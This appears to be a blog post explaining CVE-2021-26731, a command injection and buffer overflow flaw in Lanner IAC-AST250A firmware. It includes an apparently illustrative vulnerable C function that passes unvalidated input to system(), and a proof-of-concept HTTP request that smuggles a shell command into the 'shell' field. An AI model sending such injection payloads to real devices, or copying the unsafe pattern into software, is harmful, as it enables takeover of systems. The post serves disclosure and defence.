The Common Vulnerabilities and Exposures (CVE) initiative recently disclosed a critical security vulnerability (CVE-2021-26731) affecting Lanner Inc's IAC-AST250A firmware. This vulnerability, present in the modifyUserb_func function of the spx_restservice, enables an attacker to execute arbitrary code with the same privileges as the server user, potentially escalating their access level to root.
In this post, we will explore the technical details of this vulnerability, provide code snippets to better understand the issue, and discuss potential exploit scenarios. We will also reference the original vulnerability disclosure for further information.
Vulnerability Details
The vulnerability in question originates in the modifyUserb_func function within the service spx_restservice, included in Lanner's IAC-AST250A firmware version 1.10.. Specifically, the issue involves a combination of command injection and multiple stack-based buffer overflows, allowing an attacker to inject their own commands and execute them with the same privileges as the server user (typically root).
As outlined in the original vulnerability disclosure (linked below), the vulnerable function processes user inputs without proper validation, enabling an attacker to craft intentionally malicious payloads and ultimately gain control over the affected system.
Here's a code snippet illustrating the problem
void modifyUserb_func(char *src) {
char username[40];
char password[40];
char shell[40];
// Parsing user input without proper validation
sscanf(src, "username=%[^&]&password=%[^&]&shell=%s", username, password, shell);
// The system() function is vulnerable to command injection
char command[200];
snprintf(command, sizeof(command), "/bin/moduser %s %s %s", username, password, shell);
system(command);
}
In the above code snippet, the modifyUserb_func function takes the src parameter (which contains user input) and uses sscanf to parse it. However, there is no proper input validation or sanitization, making it possible for an attacker to inject their own commands.
Furthermore, the use of the vulnerable system() function allows for potential command injection, as it is used to construct a command string with the parsed username, password, and shell variables obtained from the user input.
Exploit Scenarios
A potential attacker can exploit this vulnerability by sending a crafted HTTP request to the RESTful API endpoint /modifyUser, which calls the vulnerable modifyUserb_func function in spx_restservice. By providing malicious payloads as user input, the attacker can achieve arbitrary code execution with root privileges, potentially taking full control over the server.
As an example, consider the following proof-of-concept exploit
POST /modifyUser HTTP/1.1
Host: target_host
Content-Length: 100
Content-Type: application/x-www-form-urlencoded
username=attacker&password=attacker&shell=;%20/bin/sh%20-c%20id%20>%20/tmp/exploit.out%20;
In this example, the attacker crafted an HTTP request with a specially formatted shell parameter containing an injected command, which will be executed by the system() function in the vulnerable modifyUserb_func.
Original References
For readers interested in further details about this vulnerability, we recommend reading the original vulnerability disclosure by the CVE initiative:
- CVE-2021-26731
Conclusion
CVE-2021-26731 is a critical security vulnerability affecting Lanner Inc's IAC-AST250A firmware version 1.10.. By exploiting this command injection and multiple stack-based buffer overflows vulnerability, attackers can achieve arbitrary code execution with the same privileges as the server user (root), potentially taking full control over the affected system. Users of the firmware are advised to apply patches or mitigation strategies as soon as possible to protect against possible exploits.
Timeline
Published on: 10/24/2022 14:15:00 UTC
Last modified on: 10/24/2022 17:35:00 UTC